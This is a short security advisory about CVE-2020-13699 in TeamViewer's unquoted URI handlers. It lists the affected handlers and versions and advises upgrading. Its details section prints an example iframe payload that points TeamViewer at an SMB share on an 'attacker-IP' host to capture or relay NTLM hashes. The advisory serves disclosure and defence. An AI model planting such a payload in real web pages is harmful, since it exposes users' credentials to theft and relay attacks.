CVE-2020-13699: Teamviewer Unquoted URI handler Vulnerability Alert

Recently, TeamViewer officially announced that a vulnerability has recently been fixed, which may allow an attacker to quietly establish a connection with your computer and further exploit the system. The vulnerability number is CVE-2020-13699.

The vulnerability stems from the inability of the program to correctly reference its custom URI handler. Attackers can use this vulnerability to launch TeamViewer with the help of specially crafted parameters.

“teamviewer” by laboratoriolinux is licensed under CC BY-NC-SA 2.0

Vulnerability Details

An attacker could embed a malicious iframe in a website with a crafted URL (<iframe src=’teamviewer10: –play  \attacker-IP\share\fake.tvs’>) that would launch the TeamViewer Windows desktop client and force it to open a remote SMB share. Windows will perform NTLM authentication when opening the SMB share and that request can be relayed (using a tool like responder) for code execution (or captured for hash cracking). This affects the URI handlers teamviewer10, teamviewer8, teamviewerapi, tvchat1, tvcontrol1, tvfiletransfer1, tvjoinv8, vpresent1, tvsendfile1, tvsqcustomer1, tvsqsupport1, tvvideocall1, and tvvpn1. This issue was remediated by quoting the parameters passed by the aforementioned URI handlers e.g. URL:teamviewer10 Protocol “C:\Program Files (x86)\TeamViewer\TeamViewer.exe” “%1”

Affected version

• Teamviewer versions < 8.0.258861, 9.0.258860, 10.0.258873, 11.0.258870, 12.0.258869, 13.2.36220, 14.2.56676, 14.7.48350, and 15.8.3

Solution

In this regard, we recommend that users upgrade Teamviewer in time to avoid hacker attacks.